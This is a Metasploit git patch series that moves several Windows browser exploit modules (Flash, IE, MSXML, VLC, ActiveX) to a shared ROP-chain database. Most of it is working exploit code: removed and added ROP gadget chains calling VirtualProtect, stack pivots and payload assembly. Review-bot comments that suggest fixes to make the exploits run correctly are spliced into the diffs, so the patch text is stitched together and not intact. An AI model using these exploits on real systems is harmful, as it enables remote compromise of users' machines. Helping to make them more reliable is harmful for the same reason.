From 631a06f3bbaea120d38f43d433caac9c51316acc Mon Sep 17 00:00:00 2001
From: sinn3r
Date: Fri, 5 Oct 2012 10:55:55 -0500
Subject: [PATCH 1/9] Adopt RopDb for adobe_flashplayer_flash10o.rb
---
 .../browser/adobe_flashplayer_flash10o.rb | 35 ++++---------------
 1 file changed, 6 insertions(+), 29 deletions(-)
diff --git a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
index ab51e56130..c481b5ae92 100644
--- a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
+++ b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
@@ -15,6 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
+ include Msf::Exploit::RopDb
 def initialize(info={})
 super(update_info(info, 
@@ -182,40 +183,12 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 #Targets that don't need ROP
- rop = ''
 pivot = "\xb8\x0c\x0c\x0c\x0c" #MOV EAX,0x0c0c0c0c
 pivot << "\xff\xe0" #JMP EAX
 pivot << "\x41" #Pad
 #Targets that need ROP
 if my_target['Rop']
- #Target Addr=0x0c0c0c0c
- rop =
- [
- 0x7c376402, # POP EBP # RETN [msvcr71.dll]
- 0x7c376402, # skip 4 bytes [msvcr71.dll]
- 0x7c347f97, # POP EAX # RETN [msvcr71.dll]
- 0xfffff800, # Value to negate, will become 0x00000201 (dwSize)
- 0x7c351e05, # NEG EAX # RETN [msvcr71.dll]
- 0x7c354901, # POP EBX # RETN [msvcr71.dll]
- 0xffffffff,
- 0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
- 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
- 0x7c344f87, # POP EDX # RETN [msvcr71.dll]
- 0xffffffc0, # Value to negate, will become 0x00000040
- 0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
- 0x7c34d201, # POP ECX # RETN [msvcr71.dll]
- 0x7c38b001, # &Writable location [msvcr71.dll]
- 0x7c34b8d7, # POP EDI # RETN [msvcr71.dll]
- 0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]
- 0x7c364802, # POP ESI # RETN [msvcr71.dll]
- 0x7c3415a2, # JMP [EAX] [msvcr71.dll]
- 0x7c347f97, # POP EAX # RETN [msvcr71.dll]
- 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
- 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
- 0x7c345c30, # ptr to 'push esp # ret ' [msvcr71.dll]
- ].pack("V*")
- #Target Addr=0x11111110
 pivot =
 [
@@ -223,11 +196,15 @@ class Metasploit3 < Msf::Exploit::Remote
 my_target['Pivot'], # ROP Pivot
 0x7c346b52, # EAX (POP ESP; RETN)
 ].pack('V*')
+
+ #Target Addr=0x0c0c0c0c
+ p = generate_rop_payload('java', payload.encoded)
+ else
+ p = rop + payload.encoded
 end
 arch = Rex::Arch.endian(my_target.arch)
- p = rop + payload.encoded
 shellcode = Rex::Text.to_unescape(p, arch)
 pivot = Rex::Text.to_unescape(pivot, arch)
From 98931e339a3a4a2c78aa08b4fd48b9e0070dc7a2 Mon Sep 17 00:00:00 2001 
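Review bot: The `else` branch added in the second hunk, `p = rop + payload.encoded`, references `rop`, but the first hunk removes the `rop = ''` initialisation, so targets without 'Rop' now raise NameError (undefined local `rop`) before `shellcode` is built, unless a `rop` method exists elsewhere in the module, which nothing here suggests. The empty string contributed nothing to the concatenation, so the branch should simply read `p = payload.encoded`. Both hunks sit inside a method whose start and end are outside the hunks.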
From: sinn3r
Date: Fri, 5 Oct 2012 11:05:19 -0500
Subject: [PATCH 2/9] Adopt RopDb for adobe_flash_rtmp.rb
---
 .../windows/browser/adobe_flash_rtmp.rb | 42 ++-----------------
 1 file changed, 4 insertions(+), 38 deletions(-)
diff --git a/modules/exploits/windows/browser/adobe_flash_rtmp.rb b/modules/exploits/windows/browser/adobe_flash_rtmp.rb
index 0489ce1aa0..6d86a85d34 100644
--- a/modules/exploits/windows/browser/adobe_flash_rtmp.rb
+++ b/modules/exploits/windows/browser/adobe_flash_rtmp.rb
@@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
+ include Msf::Exploit::RopDb
 include Msf::Exploit::Remote::BrowserAutopwn
 autopwn_info({ 
@@ -122,53 +123,18 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 end
- def junk(n=4)
- return rand_text_alpha(n).unpack("V").first
- end
-
- def nop
- return make_nops(4).unpack("V").first
- end
-
 def ret(t)
 return [ 0x77c4ec01 ].pack("V") # RETN (ROP NOP) # msvcrt.dll
 end
- def popret(t)
- return [ 0x77c4ec00 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcrt.dll
- end
-
 def get_rop_chain(t)
-
- # ROP chains generated by mona.py - See corelan.be
 print_status("Using msvcrt ROP")
- rop =
- [
- 0x77c4e392, # POP EAX # RETN
- 0x77c11120, # <- *&VirtualProtect()
- 0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
- junk,
- 0x77c2dd6c,
- 0x77c4ec00, # POP EBP # RETN
- 0x77c35459, # ptr to 'push esp # ret'
- 0x77c47705, # POP EBX # RETN
- 0x00001000, # EBX
- 0x77c3ea01, # POP ECX # RETN
- 0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
- 0x77c46100, # POP EDI # RETN
- 0x77c46101, # ROP NOP (-> edi)
- 0x77c4d680, # POP EDX # RETN
- 0x00000040, # newProtect (0x40) (-> edx)
- 0x77c4e392, # POP EAX # RETN
- nop, # NOPS (-> eax)
- 0x77c12df9, # PUSHAD # RETN
- ].pack("V*")
+ p = "\xbc\x0c\x0c\x0c\x0c" #mov esp,0c0c0c0c ; my way of saying 'f you' to the problem
+ p << payload.encoded
 code = ret(t)
 code << rand_text(119)
- code << rop
- code << "\xbc\x0c\x0c\x0c\x0c" #mov esp,0c0c0c0c ; my way of saying 'f you' to the problem
- code << payload.encoded
+ code << generate_rop_payload('msvcrt', p, {'target'=>'xp'})
 offset = 2616 - code.length
 code << rand_text(offset)
 code << [ t['StackPivot'] ].pack("V")
From 1268614d5456222430b5513aac2b0f02dbe72dba Mon Sep 17 00:00:00 2001
From: sinn3r
Date: Fri, 5 Oct 2012 11:15:53 -0500
Subject: [PATCH 3/9] Adopt RopDb for adobe_flash_mp4_cprt.rb
---
 .../windows/browser/adobe_flash_mp4_cprt.rb | 62 ++-----------------
 1 file changed, 4 insertions(+), 58 deletions(-)
diff --git a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
index d4240da6f3..930590bfbb 100644 
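Review bot: `offset = 2616 - code.length` (context line just below the new `code << generate_rop_payload('msvcrt', p, {'target'=>'xp'})`) now depends on the length of a chain this module no longer controls; if the DB chain plus the payload exceed the 2616-byte budget, `offset` goes negative and `rand_text(offset)` is called with a negative length, which will not pad correctly and is hard to diagnose. A guard such as `raise RuntimeError, "ROP chain plus payload exceed the 2616-byte buffer" if offset < 0` would make that failure explicit. Separately, the added `p` local and its carried-over "f you" comment hurt readability; a descriptive name such as `stack_relocate` and a plain `# mov esp, 0x0c0c0c0c` comment would read better. `ret(t)` in the context lines still ignores its `t` argument, and get_rop_chain's end lies outside the hunk.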
--- a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
+++ b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
@@ -11,7 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
-
+ include Msf::Exploit::RopDb
 include Msf::Exploit::Remote::BrowserAutopwn
 autopwn_info({
 :os_name => OperatingSystems::WINDOWS,
@@ -127,10 +127,6 @@ class Metasploit3 < Msf::Exploit::Remote
 return rand_text_alpha(n).unpack("V").first
 end
- def nop
- return make_nops(4).unpack("V").first
- end
-
 def get_payload(t, cli)
 if t['Rop'].nil? 
@@ -144,64 +140,14 @@ class Metasploit3 < Msf::Exploit::Remote
 # No rop. Just return the payload.
 return code if t['Rop'].nil?
- # Both ROP chains generated by mona.py - See corelan.be
- case t['Rop']
- when :msvcrt
- print_status("Using msvcrt ROP")
- exec_size = code.length
- rop =
- [
- 0x77c4e392, # POP EAX # RETN
- 0x77c11120, # <- *&VirtualProtect()
- 0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
- junk,
- 0x77c2dd6c,
- 0x77c4ec00, # POP EBP # RETN
- 0x77c35459, # ptr to 'push esp # ret'
- 0x77c47705, # POP EBX # RETN
- exec_size, # EBX
- 0x77c3ea01, # POP ECX # RETN
- 0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
- 0x77c46100, # POP EDI # RETN
- 0x77c46101, # ROP NOP (-> edi)
- 0x77c4d680, # POP EDX # RETN
- 0x00000040, # newProtect (0x40) (-> edx)
- 0x77c4e392, # POP EAX # RETN
- nop, # NOPS (-> eax)
- 0x77c12df9, # PUSHAD # RETN
- ].pack("V*")
-
- when :jre
- print_status("Using JRE ROP")
- exec_size = 0xffffffff - code.length + 1
- rop =
- [
- 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
- exec_size, # Value to NEG
- 0x7c347f98, # RETN (ROP NOP)
- 0x7c3415a2, # JMP [EAX]
- 0xffffffff,
- 0x7c376402, # skip 4 bytes
- 0x7c351e05, # NEG EAX # RETN
- 0x7c345255, # INC EBX # FPATAN # RETN
- 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
- 0x7c344f87, # POP EDX # RETN
- 0xffffffc0, # Value to negate, will become 0x00000040
- 0x7c351eb1, # NEG EDX # RETN
- 0x7c34d201, # POP ECX # RETN
- 0x7c38b001, # &Writable location
- 0x7c347f97, # POP EAX # RETN
- 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
- 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN
- 0x7c345c30, # ptr to 'push esp # ret '
- ].pack("V*")
- end
+ rop_name = (t['Rop'] and t['Rop'] == :msvcrt) ? 'msvcrt' : 'java'
+ rop_target = (rop_name == 'msvcrt') ? 
'xp' : ''
 pivot = [t['ppr']].pack('V*') #POP/POP/RET
 pivot << [junk].pack('V*')
 pivot << [t.ret].pack('V*')
- code = pivot + rop + code
+ code = generate_rop_payload(rop_name, code, {'target'=>rop_target})
 return code
 end
From 6fc8790dd7251fcc2c311e2046ce16a20e032552 Mon Sep 17 00:00:00 2001
From: sinn3r
Date: Fri, 5 Oct 2012 12:17:19 -0500
Subject: [PATCH 4/9] Adopt RopDb for ms12_037_same_id.rb
---
 .../windows/browser/ms12_037_same_id.rb | 65 +++---------------
 1 file changed, 8 insertions(+), 57 deletions(-)
diff --git a/modules/exploits/windows/browser/ms12_037_same_id.rb b/modules/exploits/windows/browser/ms12_037_same_id.rb
index 5855635273..ae9a39555c 100644
--- a/modules/exploits/windows/browser/ms12_037_same_id.rb
+++ b/modules/exploits/windows/browser/ms12_037_same_id.rb
@@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
+ include Msf::Exploit::RopDb
 def initialize(info={})
 super(update_info(info,
@@ -105,14 +106,6 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 end
- def junk(n=4)
- return rand_text_alpha(n).unpack("V").first
- end
-
- def nop
- return make_nops(4).unpack("V").first
- end
-
 def ret(t)
 case t['Rop']
 when :msvcrt 
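Review bot: The nil guard in `rop_name = (t['Rop'] and t['Rop'] == :msvcrt) ? 'msvcrt' : 'java'` is redundant, because `return code if t['Rop'].nil?` a few lines above already handles that case, and `and` inside a value expression is a readability trap; `rop_name = t['Rop'] == :msvcrt ? 'msvcrt' : 'java'` expresses the same thing. Two behaviour changes are worth a comment on that line: the old `case` left `rop` nil for any `t['Rop']` other than `:msvcrt`/`:jre`, whereas every other value now selects the java chain, and `'target'=>rop_target` passes an empty string for the java chain where the other modules in this series pass no target at all — confirm RopDb treats an empty target as absent, or drop the key for java. get_payload's start lies outside the hunk.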
@@ -132,63 +125,21 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 def get_rop_chain(t)
+ pivot = ret(t) * 27
+ pivot << popret(t)
+ pivot << [t.ret].pack("V") # stackpivot
- adjust = ret(t) * 27
- adjust << popret(t)
- adjust << [t.ret].pack("V") # stackpivot
-
- # Both ROP chains generated by mona.py - See corelan.be
 case t['Rop']
 when :msvcrt
 print_status("Using msvcrt ROP")
- rop =
- [
- 0x77c4e392, # POP EAX # RETN
- 0x77c11120, # <- *&VirtualProtect()
- 0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
- junk,
- 0x77c2dd6c,
- 0x77c4ec00, # POP EBP # RETN
- 0x77c35459, # ptr to 'push esp # ret'
- 0x77c47705, # POP EBX # RETN
- 0x00001000, # EBX
- 0x77c3ea01, # POP ECX # RETN
- 0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
- 0x77c46100, # POP EDI # RETN
- 0x77c46101, # ROP NOP (-> edi)
- 0x77c4d680, # POP EDX # RETN
- 0x00000040, # newProtect (0x40) (-> edx)
- 0x77c4e392, # POP EAX # RETN
- nop, # NOPS (-> eax)
- 0x77c12df9, # PUSHAD # RETN
- ].pack("V*")
+ rop = generate_rop_payload('msvcrt', '', {'target'=>'xp', 'pivot'=>pivot})
- when :jre
+ else
 print_status("Using JRE ROP")
- rop =
- [
- 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
- 0x00001000, # (dwSize)
- 0x7c347f98, # RETN (ROP NOP)
- 0x7c3415a2, # JMP [EAX]
- 0xffffffff,
- 0x7c376402, # skip 4 bytes
- 0x7c345255, # INC EBX # FPATAN # RETN
- 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
- 0x7c344f87, # POP EDX # RETN
- 0x00000040, # flNewProtect
- 0x7c34d201, # POP ECX # RETN
- 0x7c38b001, # &Writable location
- 0x7c347f97, # POP EAX # RETN
- 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
- 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN
- 0x7c345c30, # ptr to 'push esp # ret '
- ].pack("V*")
+ rop = generate_rop_payload('java', '', {'pivot'=>pivot})
 end
- code = adjust
- code << rop
- return code
+ return rop
 end
From d9278d82f85ef9e16c24b51233018b96e595808f Mon Sep 17 00:00:00 2001 
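Review bot: Replacing `when :jre` with `else` means any unrecognised `t['Rop']` value (a typo in a target definition, for instance) now silently selects the java chain while printing "Using JRE ROP", where the old `case` would have left `rop` nil and failed loudly; keeping `when :jre` and adding `else raise ArgumentError, "Unknown ROP target #{t['Rop'].inspect}"` preserves that strictness. The same `when :jre` to `else` rewrite appears in msxml_get_definition_code_exec.rb, ie_execcommand_uaf.rb and ntr_activex_check_bof.rb in this series. Both new calls also request the chain with an empty payload (`''`), so presumably the caller appends the real payload itself; if so, a comment such as `# returns pivot + chain only; the payload is appended by the caller` above `case t['Rop']` would document that contract.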
From: sinn3r
Date: Fri, 5 Oct 2012 12:20:41 -0500
Subject: [PATCH 5/9] Adopt RopDb for msxml_get_definition_code_exec.rb
---
 .../browser/msxml_get_definition_code_exec.rb | 58 ++-----------------
 1 file changed, 5 insertions(+), 53 deletions(-)
diff --git a/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb b/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
index 8b379d1142..11134f5c42 100644
--- a/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
+++ b/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
@@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::HttpServer::HTML
+ include Msf::Exploit::RopDb
 include Msf::Exploit::Remote::BrowserAutopwn
 autopwn_info({
 :ua_name => HttpClients::IE,
@@ -153,14 +154,6 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 end
- def junk(n=4)
- return rand_text_alpha(n).unpack("V").first
- end
-
- def nop
- return make_nops(4).unpack("V").first
- end
-
 def ret(t)
 case t['Rop']
 when :msvcrt
@@ -180,7 +173,6 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 def get_rop_chain(t)
-
 if t['RandomHeap']
 adjust = [ 0x0c0c0c0c ].pack("V") # heap isn't filled with pointers to 0x0c0c0c0c
 adjust << ret(t) 
@@ -196,54 +188,14 @@ class Metasploit3 < Msf::Exploit::Remote
 case t['Rop']
 when :msvcrt
 print_status("Using msvcrt ROP")
- rop =
- [
- 0x77c4e392, # POP EAX # RETN
- 0x77c11120, # <- *&VirtualProtect()
- 0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
- junk,
- 0x77c2dd6c,
- 0x77c4ec00, # POP EBP # RETN
- 0x77c35459, # ptr to 'push esp # ret'
- 0x77c47705, # POP EBX # RETN
- 0x00001000, # EBX
- 0x77c3ea01, # POP ECX # RETN
- 0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
- 0x77c46100, # POP EDI # RETN
- 0x77c46101, # ROP NOP (-> edi)
- 0x77c4d680, # POP EDX # RETN
- 0x00000040, # newProtect (0x40) (-> edx)
- 0x77c4e392, # POP EAX # RETN
- nop, # NOPS (-> eax)
- 0x77c12df9, # PUSHAD # RETN
- ].pack("V*")
+ rop = generate_rop_payload('msvcrt','',{'target'=>'xp', 'pivot'=>adjust})
- when :jre
+ else
 print_status("Using JRE ROP")
- rop =
- [
- 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
- 0x00001000, # (dwSize)
- 0x7c347f98, # RETN (ROP NOP)
- 0x7c3415a2, # JMP [EAX]
- 0xffffffff,
- 0x7c376402, # skip 4 bytes
- 0x7c345255, # INC EBX # FPATAN # RETN
- 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
- 0x7c344f87, # POP EDX # RETN
- 0x00000040, # flNewProtect
- 0x7c34d201, # POP ECX # RETN
- 0x7c38b001, # &Writable location
- 0x7c347f97, # POP EAX # RETN
- 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
- 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN
- 0x7c345c30, # ptr to 'push esp # ret '
- ].pack("V*")
+ rop = generate_rop_payload('java','',{'pivot'=>adjust})
 end
- code = adjust
- code << rop
- return code
+ return rop
 end
 def get_easy_spray(t, js_code, js_nops)
From 9a53a4962525d6846cb05dfb044434484c48e840 Mon Sep 17 00:00:00 2001
From: sinn3r
Date: Fri, 5 Oct 2012 12:54:16 -0500
Subject: [PATCH 6/9] RopDb for vlc_amv.rb
---
 modules/exploits/windows/browser/vlc_amv.rb | 39 ++-------------------
 1 file changed, 2 insertions(+), 37 deletions(-) 
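Review bot: The two new calls `generate_rop_payload('msvcrt','',{'target'=>'xp', 'pivot'=>adjust})` and `generate_rop_payload('java','',{'pivot'=>adjust})` drop the spaces after the commas that the identical calls added to ms12_037_same_id.rb in this series use, so the same helper is now invoked in two spellings. Since patch 9 of the series is already a whitespace fix, these could be normalised at the same time to `rop = generate_rop_payload('msvcrt', '', {'target'=>'xp', 'pivot'=>adjust})` and `rop = generate_rop_payload('java', '', {'pivot'=>adjust})`. get_rop_chain's start lies outside the hunk.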
diff --git a/modules/exploits/windows/browser/vlc_amv.rb b/modules/exploits/windows/browser/vlc_amv.rb
index ada101b729..b934a25879 100644
--- a/modules/exploits/windows/browser/vlc_amv.rb
+++ b/modules/exploits/windows/browser/vlc_amv.rb
@@ -15,6 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::HttpServer::HTML
+ include Msf::Exploit::RopDb
 def initialize(info={})
 super(update_info(info, 
@@ -146,43 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote
 #Generate our payload
 if my_target['Rop']
 #IE 8 targets
- #mona.py tekniq! + Payload
- code = [
- 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
- 0x7c37a140, # Make EAX readable
- 0x7c37591f, # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll)
- 0x7c348b06, # EBP (NOP)
- 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
- 0x7c37a140, # <- VirtualProtect() found in IAT
- 0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)
- 0x7c346c0b, # Slide, so next gadget would write to correct stack location
- 0x7c376069, # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)
- 0x7c348b06, # EDI (filler)
- 0x7c348b06, # will be patched at runtime (VP), then picked up into ESI
- 0x7c348b06, # EBX (filler)
- 0x7c376402, # POP EBP # RETN (msvcr71.dll)
- 0x7c345c30, # ptr to push esp # ret (from MSVCR71.dll)
- 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
- 0xfffff82f, # size 20001 bytes
- 0x7c351e05, # NEG EAX # RETN (MSVCR71.dll)
- 0x7c354901, # POP EBX # RETN (MSVCR71.dll)
- 0xffffffff, # pop value into ebx
- 0x7c345255, # INC EBX # FPATAN # RETN (MSVCR71.dll)
- 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)
- 0x7c34d201, # POP ECX # RETN (MSVCR71.dll)
- 0x7c38b001, # RW pointer (lpOldProtect) (-> ecx)
- 0x7c34b8d7, # POP EDI # RETN (MSVCR71.dll)
- 0x7c34b8d8, # ROP NOP (-> edi)
- 0x7c344f87, # POP EDX # RETN (MSVCR71.dll)
- 0xffffffc0, # value to negate, target value : 0x00000040, target: edx
- 0x7c351eb1, # NEG EDX # RETN (MSVCR71.dll)
- 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
- 0x90909090, # NOPS (-> eax)
- 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)
- ].pack('V*')
-
- #Append payload after the ROP chain
- code << payload.encoded
+ code = generate_rop_payload('java', payload.encoded)
 #Align and 'jump' to our final payload at 0x0c0c0c0c
 ini_stage = [
From f92843c96ec7f70b19ec233e7bc14ab2605914e0 Mon Sep 17 00:00:00 2001 
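Review bot: The removed chain set its VirtualProtect size explicitly (`0xfffff82f, # size 20001 bytes`), a value chosen for this module, whereas `code = generate_rop_payload('java', payload.encoded)` will use whatever size the shared DB entry encodes — presumably derived from the payload it is handed, but that is not visible here. The `ini_stage` that follows (outside the hunk) was written against the old fixed size, so it is worth confirming the DB chain still covers everything that runs after it; a comment such as `# RopDb's java chain sizes VirtualProtect from payload.encoded; the old hand-rolled chain used a fixed 20001 bytes` would record the assumption for the next reader. The enclosing method starts and ends outside the hunk.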
From: sinn3r
Date: Fri, 5 Oct 2012 13:49:17 -0500
Subject: [PATCH 7/9] RopDb for ie_execcommand_uaf.rb
---
 .../windows/browser/ie_execcommand_uaf.rb | 52 ++-----------------
 1 file changed, 5 insertions(+), 47 deletions(-)
diff --git a/modules/exploits/windows/browser/ie_execcommand_uaf.rb b/modules/exploits/windows/browser/ie_execcommand_uaf.rb
index cb24f19783..52739b323c 100644
--- a/modules/exploits/windows/browser/ie_execcommand_uaf.rb
+++ b/modules/exploits/windows/browser/ie_execcommand_uaf.rb
@@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::HttpServer::HTML
+ include Msf::Exploit::RopDb
 include Msf::Exploit::Remote::BrowserAutopwn
 autopwn_info({
 :ua_name => HttpClients::IE,
@@ -138,31 +139,9 @@ class Metasploit3 < Msf::Exploit::Remote
 0x77c4e392, # POP EAX # RETN
 0x77c15ed5, # XCHG EAX, ESP # RETN
 ].pack("V*")
- rop =
- [
- 0x77C21891, # POP ESI # RETN
- 0x0c0c0c04, # ESI
- 0x77c4e392, # POP EAX # RETN
- 0x77c11120, # <- *&VirtualProtect()
- 0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
- junk,
- 0x77c2dd6c, # XCHG EAX,ESI # ADD [EAX], AL # RETN
- 0x77c4ec00, # POP EBP # RETN
- 0x77c35459, # ptr to 'push esp # ret'
- 0x77c47705, # POP EBX # RETN
- exec_size, # EBX
- 0x77c3ea01, # POP ECX # RETN
- 0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
- 0x77c46100, # POP EDI # RETN
- 0x77c46101, # ROP NOP (-> edi)
- 0x77c4d680, # POP EDX # RETN
- 0x00000040, # newProtect (0x40) (-> edx)
- 0x77c4e392, # POP EAX # RETN
- nop, # NOPS (-> eax)
- 0x77c12df9, # PUSHAD # RETN
- ].pack("V*")
+ rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
- when :jre
+ else
 print_status("Using JRE ROP")
 exec_size = 0xffffffff - code.length + 1
 if t['Random'] 
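Review bot: `exec_size = 0xffffffff - code.length + 1` (context line at the end of the hunk, now inside the new `else` branch) is dead code: its only reader was the removed `exec_size, # Value to negate` entry of the jre chain, so the assignment should be deleted. The msvcrt branch above the hunk very likely carries the matching `exec_size = code.length` (it was consumed by the removed `exec_size, # EBX` entry) and should go as well, though that line is outside the hunk. The removed chains also referenced the `junk` and `nop` helpers; this patch does not touch their definitions, so they may now be unused in this file. get_rop_chain's start lies outside the hunk.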
@@ -179,31 +158,10 @@ class Metasploit3 < Msf::Exploit::Remote
 0x7c348b05 # XCHG EAX, ESP # RET
 ].pack("V*")
 end
- rop =
- [
- 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
- exec_size, # Value to negate, will become 0x00000201 (dwSize)
- 0x7c347f98, # RETN (ROP NOP)
- 0x7c3415a2, # JMP [EAX]
- 0xffffffff,
- 0x7c376402, # skip 4 bytes
- 0x7c351e05, # NEG EAX # RETN
- 0x7c345255, # INC EBX # FPATAN # RETN
- 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
- 0x7c344f87, # POP EDX # RETN
- 0xffffffc0, # Value to negate, will become 0x00000040
- 0x7c351eb1, # NEG EDX # RETN
- 0x7c34d201, # POP ECX # RETN
- 0x7c38b001, # &Writable location
- 0x7c347f97, # POP EAX # RETN
- 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
- 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN
- 0x7c345c30, # ptr to 'push esp # ret '
- ].pack("V*")
+ rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
 end
- code = stack_pivot + rop + code
- return code
+ return rop_payload
 end
 # Spray published by corelanc0d3r
From 33db3d9610fad257b6dac83ea4ae2f90c41fb47e Mon Sep 17 00:00:00 2001
From: sinn3r
Date: Fri, 5 Oct 2012 14:09:59 -0500
Subject: [PATCH 8/9] RopDb for ntr_activex_check_bof.rb
---
 .../windows/browser/ntr_activex_check_bof.rb | 60 ++-----------------
 1 file changed, 5 insertions(+), 55 deletions(-)
diff --git a/modules/exploits/windows/browser/ntr_activex_check_bof.rb b/modules/exploits/windows/browser/ntr_activex_check_bof.rb
index 475b82f572..a707495b20 100644
--- a/modules/exploits/windows/browser/ntr_activex_check_bof.rb
+++ b/modules/exploits/windows/browser/ntr_activex_check_bof.rb
@@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
+ include Msf::Exploit::RopDb
 include Msf::Exploit::Remote::BrowserAutopwn
 autopwn_info({ 
@@ -257,14 +258,6 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 end
- def junk(n=4)
- return rand_text_alpha(n).unpack("V")[0].to_i
- end
-
- def nop
- return make_nops(4).unpack("V")[0].to_i
- end
-
 def get_payload(t, cli)
 code = payload.encoded 
@@ -275,57 +268,14 @@ class Metasploit3 < Msf::Exploit::Remote
 case t['Rop']
 when :msvcrt
 print_status("Using msvcrt ROP")
- exec_size = code.length
- rop = [
- 0x77C21891, # POP ESI # RETN
- 0x0c0c0c04, # ESI
- 0x77c4e392, # POP EAX # RETN
- 0x77c11120, # <- *&VirtualProtect()
- 0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
- junk,
- 0x77c2dd6c, # XCHG EAX,ESI # ADD [EAX], AL # RETN
- 0x77c4ec00, # POP EBP # RETN
- 0x77c35459, # ptr to 'push esp # ret'
- 0x77c47705, # POP EBX # RETN
- exec_size, # EBX
- 0x77c3ea01, # POP ECX # RETN
- 0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
- 0x77c46100, # POP EDI # RETN
- 0x77c46101, # ROP NOP (-> edi)
- 0x77c4d680, # POP EDX # RETN
- 0x00000040, # newProtect (0x40) (-> edx)
- 0x77c4e392, # POP EAX # RETN
- nop, # NOPS (-> eax)
- 0x77c12df9, # PUSHAD # RETN
- ].pack("V*")
+ rop_payload = generate_rop_payload('msvcrt', code, {'target'=>'xp'})
- when :jre
+ else
 print_status("Using JRE ROP")
- exec_size = 0xffffffff - code.length + 1
- rop = [
- 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
- exec_size, # Value to negate, will become 0x00000201 (dwSize)
- 0x7c347f98, # RETN (ROP NOP)
- 0x7c3415a2, # JMP [EAX]
- 0xffffffff,
- 0x7c376402, # skip 4 bytes
